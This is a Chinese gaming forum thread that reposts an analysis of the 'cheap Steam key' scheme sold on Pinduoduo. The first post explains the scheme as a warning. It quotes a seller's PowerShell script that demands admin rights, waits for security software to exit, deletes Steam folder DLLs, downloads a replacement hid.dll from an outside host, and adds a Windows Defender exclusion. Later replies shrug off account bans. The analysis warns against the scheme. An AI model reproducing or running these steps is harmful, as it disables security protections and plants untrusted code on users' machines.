»
首页
|
手机数码
|
汽车资讯
|
游戏硬件
|
评测专题
|
手机壁纸
|
海淘值得买
|
度假
|
求职招聘
|
广告联系
» 您尚未登录:请
登录
|
注册
|
标签
|
帮助
|
小黑屋
|
TGFC Lifestyle
»
完全数码讨论区
» 拼多多的低价KEY是什么猫腻?(节选自吾爱皮角论坛)
发新话题
发布投票
发布商品
发布悬赏
发布活动
发布辩论
发布视频
打印
[电脑]
拼多多的低价KEY是什么猫腻?(节选自吾爱皮角论坛)
gopcboy
混世魔头
帖子
4381
精华
0
积分
25476
激骚
1349 度
爱车
大众GOLF
主机
PS3,PS4,PSV,3DS
相机
SONY A65
手机
iphone 8 Plus
来自
广州
注册时间
2006-8-30
发短消息
加为好友
当前离线
1
#
大
中
小
发表于 2025-9-4 15:50
只看该作者
一句话总结:就是把你的steam的家庭组组件替换,然后把不知道从哪里来的家庭组账户注入进去,就实现了假入库,这时候如果你去看自己的账户会发现根本没有这款游戏,但是游戏在steam里可以运行也可以玩,看起来跟正常的一样,但是这种行为在steam用户协议里是明文禁止的,一但被查出来就是封号,不要因为贪小便宜吃大亏。
详细行为分析1. 权限要求与安全规避软件先从cdk.steam.work下载了一个powershell脚本 复制代码 隐藏代码
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal(...)
if (-not ($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))) {
Write-Host"请以管理员权限运行PowerShell"-ForegroundColor:red
return
}强制要求管理员权限主动检测并关闭安全软件: 复制代码 隐藏代码
if(Get-Process"360Tray*") {
while(Get-Process"360Tray*") {
Write-Host"[360]"-Red; Sleep1.5
}
}循环检测 360 安全进程并等待其退出这种行为就不用多说了,懂得都懂2. 核心文件篡改 复制代码 隐藏代码
Remove-Item"$steamPath/version.dll"-Force
Remove-Item"$steamPath/user32.dll"-Force
Remove-Item"$steamPath/steam.cfg"-Force
Remove-Item"$steamPath/hid.dll"-Force删除关键系统文件:version.dll - Windows 版本信息库user32.dll - 用户界面核心组件steam.cfg - Steam 客户端配置文件hid.dll - 人机接口设备驱动3. 可疑文件下载 复制代码 隐藏代码
$downApi = "http://2.steam.work/api/v1/download/pwsDown"
irm-Uri$downApi-Headers@{ Referer = "libary" } -OutFile"$steamPath/hid"
Rename-Item"$steamPath/hid""$steamPath/hid.dll"
irm-Uri$downApi-Headers@{ Referer = "localData.vdf" } -OutFile"$localPath/localData.vdf"从未经验证域名下载文件(2.xxx.work)使用伪造 Referer 头部规避检察4. Windows Defender 排除配置 复制代码 隐藏代码
Add-MpPreference-ExclusionPath$steamPath将 Steam 目录加入 Defender 排除列表使恶意文件免于安全扫描5. 重启机制 复制代码 隐藏代码
Start-Process"steam://"
Write-Host"请重启Steam客户端以完成优化"-ForegroundColor:green通过特殊协议重启 Steam使篡改后的文件生效
UID
64561
帖子
4381
精华
0
积分
25476
交易积分
0
阅读权限
40
来自
广州
在线时间
7991 小时
注册时间
2006-8-30
最后登录
2025-9-5
查看详细资料
TOP
419389671
做咩阿
混世魔头
帖子
3811
精华
0
积分
52768
激骚
1294 度
爱车
1 2 3 4
主机
我去前面探探路
相机
有情况
手机
正在报告
来自
15625
注册时间
2013-6-20
发短消息
加为好友
当前离线
2
#
大
中
小
发表于 2025-9-5 00:12
只看该作者
posted by wap, platform: Samsung
建个新号不就行了
我打cs 注册5个号了
玩一会就被防外挂的t
UID
238803
帖子
3811
精华
0
积分
52768
交易积分
0
阅读权限
50
来自
15625
在线时间
17179 小时
注册时间
2013-6-20
最后登录
2025-9-6
查看个人网站
查看详细资料
TOP
熊熊哥哥
天外飞仙
帖子
11864
精华
0
积分
11019
激骚
134 度
爱车
主机
相机
手机
注册时间
2014-6-27
发短消息
加为好友
当前离线
3
#
大
中
小
发表于 2025-9-5 09:08
只看该作者
论坛以前科普过,可以用这个方法来玩D加密的游戏。
UID
244628
帖子
11864
精华
0
积分
11019
交易积分
0
阅读权限
40
在线时间
10673 小时
注册时间
2014-6-27
最后登录
2025-9-6
查看详细资料
TOP
VODKA
银河飞将
帖子
38261
精华
0
积分
24335
激骚
2159 度
爱车
主机
相机
手机
注册时间
2008-1-15
发短消息
加为好友
当前离线
4
#
大
中
小
发表于 2025-9-5 09:13
只看该作者
posted by wap, platform: Android
入库软件本来就是免费的,用不着买,只不过会封号,建个新号玩就是了,也没什么
UID
97529
帖子
38261
精华
0
积分
24335
交易积分
0
阅读权限
40
在线时间
17727 小时
注册时间
2008-1-15
最后登录
2025-9-6
查看详细资料
TOP
控制面板首页
密码修改
积分交易
积分记录
公众用户组
基本概况
版块排行
主题排行
发帖排行
积分排行
交易排行
在线时间
管理团队
管理统计
